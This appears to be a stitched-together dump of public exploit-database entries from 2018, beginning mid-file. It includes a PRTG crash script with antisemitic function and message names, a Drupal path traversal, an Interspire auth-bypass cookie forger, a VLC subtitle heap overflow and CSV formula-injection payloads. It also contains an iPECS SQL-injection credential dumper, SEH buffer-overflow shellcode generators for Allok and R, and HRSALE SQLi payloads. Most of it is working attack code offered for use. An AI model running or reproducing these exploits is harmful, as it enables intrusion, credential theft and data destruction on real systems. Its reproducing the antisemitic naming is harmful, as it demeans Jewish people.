██║██╔════╝██║ ██║██║██╔════╝██║ ██║ ████╗ ██║██╔══██╗██╔══██╗██╔══██╗██║ ████╗ ████║
██║█████╗ ██║ █╗ ██║██║███████╗███████║ ██╔██╗ ██║███████║██████╔╝███████║██║ ██╔████╔██║
██ ██║██╔══╝ ██║███╗██║██║╚════██║██╔══██║ ██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║ ██║╚██╔╝██║
╚█████╔╝███████╗╚███╔███╔╝██║███████║██║ ██║ ██║ ╚████║██║ ██║██║ ██║ ██║███████╗██║ ╚═╝ ██║
╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
"""
banner2 = """
Author: @Lucas "luriel" Carmo
"""
os.system('clear')
print(green+banner)
print(yellow+banner2)
print(normal)
def check_http(url):
pattern = re.compile("http://")
return re.search(pattern, url)
def sanitize_url(url):
if(not check_http(url)):
return "http://" + url
return url
def check_server(url):
r = requests.get(url, timeout=4)
code = r.status_code
def send_jewish_payload(url):
payload = {'file':'addmap.htm'}
r = requests.post(url, params=payload)
def main():
try:
if len(sys.argv) <= 3 and len (sys.argv) >= 2:
try:
url = sanitize_url(sys.argv[1])
print(' [#] LOADING!')
if (check_server(url) != 404):
send_jewish_payload(url)
else:
print(' [!] Server shutdown or not found')
except requests.exceptions.ConnectionError:
print(' [~] BOOOOOM! PRTG Server has been exploded!')
except requests.exceptions.InvalidURL:
print(' [!] Invalid URL')
except requests.exceptions.Timeout:
print(' [!] Connection Timeout\n')
else:
print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
except KeyboardInterrupt:
print(' [!] Jewish Napalm Canceled;.....[./]')
if __name__ == '__main__':
main()
#Title: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
#Author: Larry W. Cashdollar
#Date: 2018-03-30
#CVE-ID: CVE-2018-9205
#Download Site: https://www.drupal.org/project/avatar_uploader
#Vendor: https://www.drupal.org/u/robbinzhao
#Vendor Notified: 2018-04-02
#Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146
#Advisory: http://www.vapidlabs.com/advisory.php?v=202
#Description: This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript. Such as, users' mouse hover on avatar, the edit link will slideup, or others.
#Vulnerability:
#The view.php contains code to retrieve files but no code to verify a user should be able to view files or keep them from changing the path to outside of the uploadDir directory:
<?php
$file = $_GET['file'];
echo file_get_contents("uploadDir/$file");
exit;
Exploit Code:
http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
'''
# Exploit Title: Interspire Email Marketer - Remote Admin Authentication Bypass
# Google Dork: intitle:"Control Panel" + emailmarketer
# Date: 4-22-18
# Exploit Author: devcoinfet
# Vendor Homepage: www.interspire.com/emailmarketer
# Software Link: Can't legally provide link but can be found on net
# Version: [6.1.3-6.1.6]
# Tested on: Below 6.1.6
# CVE : CVE-2017-14322
https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
https://github.com/joesmithjaffa/CVE-2017-14322
thanks to above Researchers
1. Description
this is used like this
--------------------------
exploit.py url/email-marketer/admin/index.php
2. Proof of Concept
'''
import requests
import sys
from bs4 import BeautifulSoup
from pprint import pprint
def cookie_cutter(url):
with requests.Session() as s:
s.get(url)
r = s.get(url)
response_regex = r.text
print("requesting initial Cookie\n")
print(str(r.headers)+"\n")
for key,value in s.cookies.items():
if key and "IEMSESSIONID" in key:
s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
print("Attempting To Posion 2nd request with Forged Cookie\n")
print("-" * 25)
r = s.get(url)
response_regex2 = r.text
print response_regex2
print(str(r.headers) + "\n")
if response_regex != response_regex2:
for key,value in s.cookies.items():
if "IEMSESSIONID" in key:
try:
#using session riding from previous cookie we grab the info we want :)
bounce_info_grab(url,value)
app_info_grab(url,value)
privt_info_grab(url,value)
except:
pass
return value,r.text
def bounce_info_grab(url,session_to_ride):
url_grab = url+"?Page=Settings&Tab=2"
print(url_grab)
with requests.Session() as s:
s.get(url_grab)
s.cookies.set('IEMSESSIONID',session_to_ride)
r = s.get(url_grab)
response_regex = r.text
soup = BeautifulSoup(response_regex,'html5lib')
div = soup.find('div', id='div7')
outfile = open("bounce_report.txt",'w')
dataout = """<html><head>Report</head><title>Report</title>
<body>""" + str(div) +"""</body></html>"""
outfile.write(dataout)
outfile.close()
for divy in div.contents:
print(divy)
def app_info_grab(url,session_to_ride):
url_grab = url+"?Page=Settings&Tab=2"
print(url_grab)
with requests.Session() as s:
s.get(url_grab)
s.cookies.set('IEMSESSIONID',session_to_ride)
r = s.get(url_grab)
response_regex = r.text
soup = BeautifulSoup(response_regex,'html5lib')
div = soup.find('div', id='div1')
outfile = open("application_settings_report.txt",'w')
dataout = """<html><head>Report</head><title>Report</title>
<body>""" + str(div) +"""</body></html>"""
outfile.write(dataout)
outfile.close()
for divy in div.contents:
print(divy)
def privt_info_grab(url,session_to_ride):
url_grab = url+"?Page=Settings&Tab=2"
print(url_grab)
with requests.Session() as s:
s.get(url_grab)
s.cookies.set('IEMSESSIONID',session_to_ride)
r = s.get(url_grab)
response_regex = r.text
soup = BeautifulSoup(response_regex,'html5lib')
div = soup.find('div', id='div8')
outfile = open("privtlbl_settings_report.txt",'w')
dataout = """<html><head>Report</head><title>Report</title>
<body>""" + str(div) +"""</body></html>"""
outfile.write(dataout)
outfile.close()
for divy in div.contents:
print(divy)
def main():
url = sys.argv[1]
print "Evaluating Target:" +url+ """ For CVE-2017-14322"""+"\n"
print "-" * 25
try:
session_rider_value,content = cookie_cutter(url)
print "Session Has Been Generated Entering Internal Data Dumping Routine"+"\n"
print "-" * 25
print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
print "-" * 25
print session_rider_value+"\n"
print "-" * 25
except:
print "Target Is Not Vulnerable"
pass
main()
'''
When Running this, if it is succesful check for 3 files in the directory of exploit to find crucial internal configs in Html format
do not use this for bad just dont do it please.
3. Solution:
Update to version 6.1.6 atleast
http://www.interspire.com/emailmarketer
'''
"""
VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)
Author: SivertPL (kroppoloe@protonmail.ch)
CVE: CVE-2017-8311
Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll.
This is the Proof of Concept of the reverse engineered heap corruption vulnerability affecting JacoSUB parsing in VLC/Kodi/PopcornTime.
The crash is exploitable, but hard to exploit because of various environmental constraints such as threading/mitigations/scriptless.
I want to join a research team.
"""
"""
ModLoad: 00000000`71660000 00000000`716a2000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 00000000`71630000 00000000`71651000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 00000000`71610000 00000000`7162e000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 00000000`71600000 00000000`7160d000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll
ModLoad: 00000000`715e0000 00000000`715fd000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll
ModLoad: 00000000`715d0000 00000000`715de000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll
ModLoad: 00000000`715b0000 00000000`715cf000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll
core demux error: option sub-original-fps does not exist
(33c.d10): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll -
libsubtitle_plugin+0x44de:
715b44de 881f mov byte ptr [edi],bl ds:002b:1b9fb000=??
0:012:x86> g
(33c.d10): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64NotifyDebugger+0x1d:
00000000`754ac9f1 654c8b1c2530000000 mov r11,qword ptr gs:[30h] gs:00000000`00000030=????????????????
"""
import os
import struct
import sys
import argparse
len = 1025
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument("filename", help="Name of the movie file w/o extension, for generating payload")
parser.add_argument("--length", help="Heap overwrite length (default 1025, may be bigger)", type=int)
args = parser.parse_args()
if args.length:
global len
len = args.length
print "[+] Generating file %s.jss with overwrite size of %d" % (args.filename, len)
write(args.filename, len)
def write(name, len):
subtitles = open("%s.jss" % name, "w+")
subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n")
subtitles.write("0:00:04.00 0:00:05.00 vm attack")
subtitles.write("\\C")
subtitles.write(struct.pack('B', 0))
subtitles.write('A' * len)
subtitles.close()
print "[+] Done!"
if __name__ == "__main__":
main(sys.argv[1:])
# Exploit Title: Monstra CMS 3.0.4 allows remote attackers to delete folder via an get request
# Date: 2018-03-26
# Exploit Author: Wenming Jiang
# Vendor Homepage: https://github.com/monstra-cms/monstra
# Software Link: https://github.com/monstra-cms/monstra
# Version: 3.0.4
# Tested on: macos 10.12.6, php 5.6, apache2.2.29
# CVE :CVE-2018-9038
Description:
Monstra CMS 3.0.4 allows remote attackers to delete folder via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request.
Steps to Reproduce:
1、Log in as a user with page editing permissions
2、Request http://your_site/admin/index.php?id=filesmanager&delete_dir=./&path=uploads
3、The uploads folder will be deleted.
Poc code:
GET /monstra/admin/index.php?id=filesmanager&delete_dir=./&path=uploads/&token=008708df48237172f6fe2d173dc30529eac132de HTTP/1.1
Host: localhost:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.10 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8000/monstra/admin/index.php?id=filesmanager&path=uploads/
Accept-Language: zh,zh-CN;q=0.9,en;q=0.8,zh-TW;q=0.7
Cookie: SQLiteManager_currentLangue=2; PHPSESSID=882dd1e203c979cedba4524f8107eca3; _ga=GA1.1.1742657188.1524382699; _gid=GA1.1.918663288.1524382699
Connection: close
Vulnerability Type:
Insecure Permissions
Expected Behavior:
deleted uploads folder
Possible Solutions:
Strictly filter the delete_dir parameter and replace './' with '_/'
Hi Guys,
#######################################
# Exploit Title: Open-AudIT 2.1 - CSV Macro Injection Vulnerability
# Google Dork: N/A
# Date: 21-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: https://opmantek.com
# Software Link: https://www.open-audit.org/downloads.php
# Affected Version: 2.1
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-9137
#######################################
1. Vendor Description:
Open-AudIT intelligently scans an organization’s network and stores the
configurations of the discovered devices.
A powerful reporting framework enables information such as software
licensing, configuration changes, non-authorized devices, capacity
utilization and hardware warranty status to be extracted and explored.
Open-AudIT Enterprise comes with additional features including Business
Dashboards, Report filtering, Scheduled discovery, Scheduled Reports and
Maps.
2. Technical Description:
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
the export feature in the OpenAudIT before 2.2 via a value that is
mishandled in a CSV export.
3. Proof of Concept:
Login and Navigate to the any field which is having export feature and
create an entry with @SUM(1+1)*cmd|' /C calc'!A0.
When user logged in and exported user data then the CSV
Formula gets executed and calculator will get popped in his machine.
4. Solution:
Update to latest version
https://www.open-audit.org/downloads.php
# -*- coding: utf-8 -*-
# Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. Dump
# Vendor Notification: 03-03-2018 - No response
# Initial CVE: 04-04-2018
# Disclosure: 21-04-2018
# Exploit Author: Berk Cem Göksel
# Contact: twitter.com/berkcgoksel || bgoksel.com
# Vendor Homepage: http://www.ipecs.com/
# Version: A.1Ac and possibly earlier
# Tested on: Windows 2008 R2 x64
# CVE-2018-9245: Multiple SQL injections
# CVE-2018-10285: Incorrect access control
# CVE-2018-10286: Sensitive information disclosure
#--------Description--------#
#
#
# The Ericsson-LG iPECS NMS version A.1Ac and possibly earlier disclose sensitive
# information such as cleartext database and NMS login credentials, use incorrect
# access control mechanisms, are vulnerable to MiTM attacks and are prone to
# SQL injection attacks on multiple parameters.
#
# This script dumps some sensitive information.
#
#
# Why use it?
#
# Normally, you can bypass the login through the SQLi but will get "kicked out".
# Thankfully, we can leverage this to extract the actual admin credentials for
# the web app. In order to do this, we must first dump the database
# credentials in cleartext.
#
#
# Usage = python cred_dump.py IP_adress port
# Example = python cred_dump.py 192.168.1.35 80
from sys import argv
import sys
import os
import time
import requests
import re
if len(argv) != 3:
print "The script takes two mandatory arguments."
print "\nExample usage: python cred_dump.py 192.168.1.35 80"
sys.exit("Exiting...")
arg,IP,port=argv
#Log in through SQLi. Otherwise the next POST request is rejected.
sqli_path = "/nms/php/module/main/main_login.php"
sqli_url = "http://" + IP + ":" + port + sqli_path
sqli_cookies = {"mainTab_selectedChild": "sysinfoTab"}
sqli_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/index.html", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
sqli_data={"id": "1", "passwd": "1' or 1=1--"}
r = requests.post(sqli_url, headers=sqli_headers, cookies=sqli_cookies, data=sqli_data)
print(r.status_code, r.reason)
time.sleep(1)
#Thanks to incorrect access control we can
#dump cleartext database credentials
dump_path = "/nms/php/module/main/main_start.php"
dump_url = "http://" + IP + ":" + port + dump_path
nms_cookie = {"mainTab_selectedChild": "sysinfoTab"}
nms_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/nms/index.html", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
nms_data={"command": "nms_start", "client_id": "20"}
r2 = requests.post(dump_url, headers=nms_headers, cookies=nms_cookie, data=nms_data)
print(r2.status_code, r2.reason)
db_cred_dump = r2.content
time.sleep(1)
#Extract db user and db pass from the dump
m = re.search(r"db_user:'(.*)'.*db_pwd:'([^']*)", db_cred_dump)
if m is not None:
postgre_db_user = m.group(1)
postgre_db_pwd = m.group(2)
else:
print "Something went wrong parsing the credentials. Check the dump manually."
client_id = "2" #Doesn't really matter
user_id = "10" #Doesn't matter either
db_user = postgre_db_user # This does matter
db_pwd = postgre_db_pwd # So does this
#Use db user and password to extract admin credentials for the NMS
users_path = "/nms/php/module/init/module_init.php"
users_url = "http://" + IP + ":" + port + users_path
users_cookies = {"mainTab_selectedChild": "sysinfoTab"}
users_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/nms/index.html", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
users_data={"command": "init_configuration", "client_id": "2", "user_id": user_id, "db_user": db_user, "db_pwd": db_pwd, "mfimSeq": "0", "req_system_id": "0", "req_system_name": ''}
r3 = requests.post(users_url, headers=users_headers, cookies=users_cookies, data=users_data)
print(r3.status_code, r3.reason)
user_dump = r3.content
print "Done. You can log in to the postgresql database using the below credentials."
print "\ndb_user: " + postgre_db_user
print "db_pwd: " + postgre_db_pwd
print "\nAnd/Or you can log in to the NMS using the following credentials"
m1 = re.search(r"userList:\[\[\d,'([^']*)','([^']*)", user_dump)
if m1 is not None:
nms_admin = m1.group(1)
nms_pwd = m1.group(2)
print "\ndb_admin: " + nms_admin
print "db_pwd: " + nms_pwd
else:
print "\nDid not get nms_admin and nms_pwd. Check the dump manually."
dumpfile = open("ipecsnms_dump.txt","w")
dumpfile.write(db_cred_dump)
dumpfile.write(user_dump)
dumpfile.close()
print "\nRaw output written to ipecsnms_dump.txt for further username and group enumeration."
print "Have fun!"
#######################################################
# Exploit Title: Buffer Overflow(SEH) on Allok Video to DVD Burner2.6.1217
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_dvdburner.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: Allok Video to DVD Burner 2.6.1217
# Tested on: Windows 7 SP1 x86
# Hello subinacls !
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################
print"""
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Copy the contents of the file (Evil.txt)and paste in the License Name field
#5. Click Register and BOMM !!!! """
import struct
file = open("Evil.txt","wb")
buffer = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh = struct.pack("<L",0x10019A09)
nop = "\x90" * 20
# Shellcode Calc.exe
buf = ""
buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
buf +="\xc4\xd9"
exploit = junk + nseh + seh + nop + buf
fillers = buffer - len(exploit)
crush = exploit + "T" * fillers
print "[+] Crush Me"
file.write(crush)
file.close()
# Exploit Title: HRSALE The Ultimate HRM 1.0.2 - CSV Injection
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10257
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
# Version: 1.0.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
Release Date:
=============
2018-04-23
Product & Service Introduction:
===============================
HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
Technical Details & Description:
================================
A user is able to inject a command that will be included in the exported CSV file.
Proof of Concept (PoC):
=======================
1. Login with employee user credentials
2. Browse to My Profile and add =cmd|'/C calc'!A1 into the First Name field
3. Log in with admin's credentials
4. Browse to Core HR > Employees Last Login
5. Click on the CSV button to download and open the exported CSV file
#!/usr/bin/python
#
# Exploit Author: bzyo
# CVE: CVE-2018-9060
# Twitter: @bzyo_
# Exploit Title: R 3.4.4 - Local Buffer Overflow
# Date: 03-27-2018
# Vulnerable Software: R 3.4.4
# Vendor Homepage: https://www.r-project.org/
# Version: 3.4.4
# Software Link: https://cloud.r-project.org/bin/windows/
# Tested On: Windows 7 x86
#
# Timeline:
# 03-27-18: Emailed author, no response
# 04-03-18: Emailed author, no response
# 04-10-18: Emailed author, no response
# 04-23-18: New version released; Submitted public disclosure
#
# lots of bad chars, use alpha_mixed
# badchars \x00\x0a\x0d\x0e and \x80 through \xbf
#
#
# PoC:
# 1. generate r344.txt, copy contents to clipboard
# 2. open app, select Edit, select 'GUI preferences'
# 3. paste r344.txt contents into 'Language for menus and messages'
# 4. select OK
# 5. pop calc
#
filename="r344.txt"
junk = "A"*900
#jump 6
nseh = "\xeb\x06\xcc\xcc"
#0x643c17af : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [Riconv.dll]
seh = "\xaf\x17\x3c\x64"
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")
fill = "D"*8000
buffer = junk + nseh + seh + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10256
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
# Version: 1.0.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
Release Date:
=============
2018-04-23
Product & Service Introduction:
===============================
HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
Technical Details & Description:
================================
SQL injection on [award_id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/admin/user/read_awards/?jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS
Parameter: award_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS